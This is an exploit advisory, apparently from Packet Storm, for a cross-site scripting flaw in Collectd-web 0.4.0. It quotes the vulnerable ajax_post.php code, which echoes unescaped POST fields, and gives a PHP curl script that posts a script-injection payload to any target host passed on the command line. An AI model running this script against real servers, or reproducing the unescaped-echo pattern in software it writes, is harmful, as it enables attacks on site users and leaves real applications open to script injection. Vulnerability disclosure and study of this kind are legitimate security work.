Collectd-Web version 0.4.0 suffers from a cross site scripting vulnerability.
677f1e138f0fabb145e534d65964d3ca14c126d42cb45b63a3c352e5b9a2b25aTitle -Collectd-web XSS
# Exploit Title : XSS Vulnerabilitie in Collectd-web
# Date: Sun May 22 11:55:36 EDT 2016
# Reported Date : Sun May 22 11:55:36 EDT 2016
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web
# Version: Version: 0.4.0
# Software Link: https://github.com/httpdss/collectd-web
# solution :https://github.com/httpdss/collectd-web/issues/77
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================
1. VULNERABILITY
-------------------------
XSS Vulnerabilitie in Collectd-web 0.4.0 – January2016
2. BACKGROUND
-------------------------
Collectd-web is a web-based front-end for RRD data collected by collectd.
It is based on contrib/collection.cgi, a demo CGI script included in
collectd.
With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web
manages to give sysadmins a nice yet functional interface.
3. DESCRIPTION
-------------------------
XSS in ajax_post.php
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php
1 <?php
2 $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera
7");
3 $movies = array("Transformers","Knocked Up","Live Free Die Hard");
4 $title = "-";
5 if ($_POST["zip"]) {
6 $title = "Zip " . $_POST['zip'];
7 } else {
8 $title = $_POST['movie'];
9 }
10 ?>
11 <div>
12 <div class="toolbar">
13 <h1><?php echo $title ?></h1>
14 <a href="#" class="button back">Back</a>
15 </div>
16 <ul class="edgetoedge">
17 <?php
18 if ($_POST['zip']) {
19 foreach ($theaters as $theater) {
20 echo '<li><a href="#theater">' . $theater . '</a></li>';
21 }
22 } else {
23 foreach ($movies as $movie) {
24 echo '<li><a href="#movie">' . $movie . '</a></li>';
25 }
26 }
27 ?>
28 </ul>
29 <form action="ajax_post.php" method="POST">
30 <ul class="rounded">
31 <li><input type="text" name="zip" value="" placeholder="Live
post event test" /></li>
32 </ul>
33 <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#"
class="submit whiteButton">Submit</a>
34
35 </form>
36 </div>
in line 5 have VULNERABILITY in zip POST method
====================================Exploit=========================================
<?php
$yourtarget = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://
$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"movie=></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
====================================Exploit=========================================
4. discovered by :
-------------------------
The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com
5 .LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed